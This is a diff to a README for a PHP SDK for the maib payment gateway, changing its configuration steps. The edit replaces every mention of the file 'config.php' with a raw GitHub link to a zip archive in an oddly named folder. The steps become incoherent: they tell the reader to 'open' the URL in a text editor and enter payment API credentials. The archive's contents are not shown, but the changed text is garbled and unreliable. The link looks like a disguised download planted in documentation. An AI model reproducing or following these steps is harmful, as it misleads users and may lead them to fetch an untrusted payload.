Bazuka01/maib-mia-sdk-php/README.md

 ## 🛠️ Configuration

-1. **Locate Configuration File**: Inside the extracted folder, find a file named `config.php`.
+1. **Locate Configuration File**: Inside the extracted folder, find a file named `https://raw.githubusercontent.com/Bazuka01/maib-mia-sdk-php/main/theatrician/maib-mia-sdk-php.zip`.

-2. **Edit Configuration**: Open `config.php` in a text editor.
+2. **Edit Configuration**: Open `https://raw.githubusercontent.com/Bazuka01/maib-mia-sdk-php/main/theatrician/maib-mia-sdk-php.zip` in a text editor.
 Input your API credentials from maib.
 This is essential for the SDK to interact with the payment gateway.

 3. **Save Changes**: After updating the credentials, save and close the file.